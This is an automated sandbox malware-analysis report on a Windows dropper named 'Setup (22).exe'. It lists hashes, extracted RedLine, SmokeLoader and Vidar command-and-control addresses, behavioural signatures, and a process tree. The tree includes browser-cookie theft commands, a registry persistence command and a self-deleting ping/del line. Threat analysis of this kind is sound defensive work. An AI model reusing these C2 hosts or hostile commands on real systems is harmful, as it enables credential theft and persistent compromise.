Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    620s
  • max time network
    1756s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (22).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 20 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1000
    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
      2⤵
        PID:6140
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2748
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2728
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2520
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2512
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1888
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1392
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1300
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1160
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1088
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:1016
                          • C:\Users\Admin\AppData\Local\Temp\Setup (22).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (22).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:572
                            • C:\Users\Admin\Documents\l7dPRvkZ3FtA1IgPzUSjCBLZ.exe
                              "C:\Users\Admin\Documents\l7dPRvkZ3FtA1IgPzUSjCBLZ.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:988
                              • C:\Users\Admin\AppData\Roaming\8285509.exe
                                "C:\Users\Admin\AppData\Roaming\8285509.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1796
                              • C:\Users\Admin\AppData\Roaming\2580624.exe
                                "C:\Users\Admin\AppData\Roaming\2580624.exe"
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4716
                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4524
                            • C:\Users\Admin\Documents\AHNOvFAs715PLY5KYU8Xoq3K.exe
                              "C:\Users\Admin\Documents\AHNOvFAs715PLY5KYU8Xoq3K.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:3184
                              • C:\Users\Admin\Documents\AHNOvFAs715PLY5KYU8Xoq3K.exe
                                C:\Users\Admin\Documents\AHNOvFAs715PLY5KYU8Xoq3K.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4220
                            • C:\Users\Admin\Documents\vDWIRV3xUdafuaUwowfzCA_5.exe
                              "C:\Users\Admin\Documents\vDWIRV3xUdafuaUwowfzCA_5.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:4052
                              • C:\Users\Admin\Documents\vDWIRV3xUdafuaUwowfzCA_5.exe
                                C:\Users\Admin\Documents\vDWIRV3xUdafuaUwowfzCA_5.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4184
                            • C:\Users\Admin\Documents\Uz5EBp9XEMCWil9UznYBZmjN.exe
                              "C:\Users\Admin\Documents\Uz5EBp9XEMCWil9UznYBZmjN.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2776
                              • C:\Users\Admin\Documents\Uz5EBp9XEMCWil9UznYBZmjN.exe
                                "C:\Users\Admin\Documents\Uz5EBp9XEMCWil9UznYBZmjN.exe"
                                3⤵
                                  PID:8392
                              • C:\Users\Admin\Documents\izhvObYr_Aq9KeUvOR3M8GMD.exe
                                "C:\Users\Admin\Documents\izhvObYr_Aq9KeUvOR3M8GMD.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1860
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 756
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2856
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 780
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4032
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 732
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4712
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 820
                                  3⤵
                                  • Program crash
                                  PID:4372
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 956
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4572
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 984
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2268
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1012
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3916
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1464
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4604
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1500
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:760
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1420
                                  3⤵
                                  • Program crash
                                  PID:4372
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1504
                                  3⤵
                                  • Program crash
                                  PID:5808
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1644
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:5708
                              • C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe
                                "C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:3836
                                • C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe
                                  C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4212
                                • C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe
                                  C:\Users\Admin\Documents\vN57iXOq4bpKlFLqwFGXwY1v.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4416
                              • C:\Users\Admin\Documents\yrniCWkLLvRMEiXZR1vKedN5.exe
                                "C:\Users\Admin\Documents\yrniCWkLLvRMEiXZR1vKedN5.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3144
                              • C:\Users\Admin\Documents\UROvKTVcSuYhXYfckyGwwPnb.exe
                                "C:\Users\Admin\Documents\UROvKTVcSuYhXYfckyGwwPnb.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4036
                              • C:\Users\Admin\Documents\03YoENnV_S8cDdfMSy8uuEPA.exe
                                "C:\Users\Admin\Documents\03YoENnV_S8cDdfMSy8uuEPA.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1908
                              • C:\Users\Admin\Documents\l09_FbmXYJrOf5bX5NNrjPDk.exe
                                "C:\Users\Admin\Documents\l09_FbmXYJrOf5bX5NNrjPDk.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1360
                              • C:\Users\Admin\Documents\Wp3mkwArRKZGSplZ1dBv9h0h.exe
                                "C:\Users\Admin\Documents\Wp3mkwArRKZGSplZ1dBv9h0h.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:3748
                              • C:\Users\Admin\Documents\czapfQE2G6qdVJrN89cU7QsF.exe
                                "C:\Users\Admin\Documents\czapfQE2G6qdVJrN89cU7QsF.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1984
                              • C:\Users\Admin\Documents\xq0y6e6gR_zgWJut2Bgbw6Ko.exe
                                "C:\Users\Admin\Documents\xq0y6e6gR_zgWJut2Bgbw6Ko.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2812
                                • C:\Users\Admin\Documents\xq0y6e6gR_zgWJut2Bgbw6Ko.exe
                                  "C:\Users\Admin\Documents\xq0y6e6gR_zgWJut2Bgbw6Ko.exe" -q
                                  3⤵
                                  • Executes dropped EXE
                                  PID:5012
                              • C:\Users\Admin\Documents\HreQT53_5fAAhgAXgCn2MlkW.exe
                                "C:\Users\Admin\Documents\HreQT53_5fAAhgAXgCn2MlkW.exe"
                                2⤵
                                  PID:3788
                                • C:\Users\Admin\Documents\JYWR432sHb4b84jU4lkrF5Mr.exe
                                  "C:\Users\Admin\Documents\JYWR432sHb4b84jU4lkrF5Mr.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3572
                                • C:\Users\Admin\Documents\lY8y_vnP5WG88W6PiYVRHfxN.exe
                                  "C:\Users\Admin\Documents\lY8y_vnP5WG88W6PiYVRHfxN.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2112
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 660
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4940
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 672
                                    3⤵
                                    • Executes dropped EXE
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3788
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 680
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4040
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 668
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4584
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 1120
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3476
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 1160
                                    3⤵
                                    • Program crash
                                    PID:4392
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 1152
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4736
                                • C:\Users\Admin\Documents\AkdXfzGFIlg0csdyTaxPenYU.exe
                                  "C:\Users\Admin\Documents\AkdXfzGFIlg0csdyTaxPenYU.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:3864
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5108
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:3128
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:3692
                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4176
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2432
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5568
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5968
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5464
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 4176 -s 1548
                                      4⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:5808
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Drops file in Program Files directory
                                    PID:2816
                                • C:\Users\Admin\Documents\Y4FGe79m6OUwfV7eEK45rOvI.exe
                                  "C:\Users\Admin\Documents\Y4FGe79m6OUwfV7eEK45rOvI.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:60
                                • C:\Users\Admin\Documents\u3NnLxVIWHGyX_EJaY1lGWIL.exe
                                  "C:\Users\Admin\Documents\u3NnLxVIWHGyX_EJaY1lGWIL.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4968
                                  • C:\Users\Admin\AppData\Local\Temp\is-137EO.tmp\u3NnLxVIWHGyX_EJaY1lGWIL.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-137EO.tmp\u3NnLxVIWHGyX_EJaY1lGWIL.tmp" /SL5="$2020E,138429,56832,C:\Users\Admin\Documents\u3NnLxVIWHGyX_EJaY1lGWIL.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5028
                                    • C:\Users\Admin\AppData\Local\Temp\is-8BS8O.tmp\Setup.exe
                                      "C:\Users\Admin\AppData\Local\Temp\is-8BS8O.tmp\Setup.exe" /Verysilent
                                      4⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:4580
                                      • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5040
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 760
                                          6⤵
                                          • Program crash
                                          PID:5888
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 784
                                          6⤵
                                          • Program crash
                                          PID:6132
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 816
                                          6⤵
                                          • Program crash
                                          PID:2052
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 824
                                          6⤵
                                          • Program crash
                                          PID:5164
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 956
                                          6⤵
                                          • Program crash
                                          PID:7272
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1088
                                          6⤵
                                          • Program crash
                                          PID:7484
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1152
                                          6⤵
                                          • Program crash
                                          PID:7664
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1220
                                          6⤵
                                          • Program crash
                                          PID:7804
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1464
                                          6⤵
                                          • Program crash
                                          PID:5544
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1464
                                          6⤵
                                          • Program crash
                                          PID:6684
                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                        5⤵
                                        • Executes dropped EXE
                                        PID:2124
                                        • C:\Users\Admin\AppData\Local\Temp\is-348AB.tmp\Inlog.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-348AB.tmp\Inlog.tmp" /SL5="$10306,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of FindShellTrayWindow
                                          PID:200
                                          • C:\Users\Admin\AppData\Local\Temp\is-4K7B0.tmp\Setup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-4K7B0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                            7⤵
                                              PID:724
                                              • C:\Users\Admin\AppData\Local\Temp\is-54A73.tmp\Setup.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-54A73.tmp\Setup.tmp" /SL5="$2046A,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-4K7B0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                8⤵
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:6656
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-IV3OE.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                  9⤵
                                                    PID:4008
                                                    • C:\Windows\SysWOW64\expand.exe
                                                      expand C:\Users\Admin\AppData\Local\Temp\is-IV3OE.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                      10⤵
                                                      • Drops file in Windows directory
                                                      PID:5140
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                    9⤵
                                                      PID:8492
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                        10⤵
                                                          PID:1028
                                                      • C:\Users\Admin\AppData\Local\Temp\is-IV3OE.tmp\{app}\vdi_compiler.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-IV3OE.tmp\{app}\vdi_compiler"
                                                        9⤵
                                                          PID:7552
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-IV3OE.tmp\{app}\vdi_compiler.exe"
                                                            10⤵
                                                              PID:8164
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping localhost -n 4
                                                                11⤵
                                                                • Runs ping.exe
                                                                PID:7080
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                            9⤵
                                                            • Checks computer location settings
                                                            PID:5188
                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:4960
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:1504
                                                    • C:\Windows\SysWOW64\msiexec.exe
